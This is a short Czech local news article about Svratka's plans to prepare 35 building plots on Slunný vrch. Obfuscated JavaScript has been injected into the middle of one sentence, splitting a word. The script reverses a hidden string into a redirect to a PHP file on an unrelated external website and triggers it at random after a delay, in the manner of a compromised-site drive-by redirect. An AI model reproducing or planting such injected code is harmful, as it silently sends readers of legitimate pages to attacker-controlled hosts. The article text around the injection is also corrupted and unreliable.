Svratka, stavební pozemek
Rainbow page separator

Ve Svratce připraví další parcely pro stavebníky

Pondělí, 27. října 2014

Svratka, stavební pozemky v části Tábor - Slunný vrch

Svratka / Pětatřicet nových stavebních parcel pro výstavbu rodinných domků v lokalitě Tábor na místě nazvaném Slunný vrch plánuje připravit svratecká radnice.
V současné době je očekáváno dokončení zpracování projek[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tové dokumentace potřebné pro územní řízení na vybavení lokality inženýrskými sítěmi.
Zasíťování pozemků na Slunném vrchu by se mělo uskutečnit v průběhu příštího roku, aby noví majitelé svrateckých stavebních parcel mohli zahájit výstavbu domků nejpozději v roce 2016.
Veřejnost bude o kritériích prodeje a přidělování stavebních pozemků informována prostřednictvím úřední desky a oficiálních webových stránek města.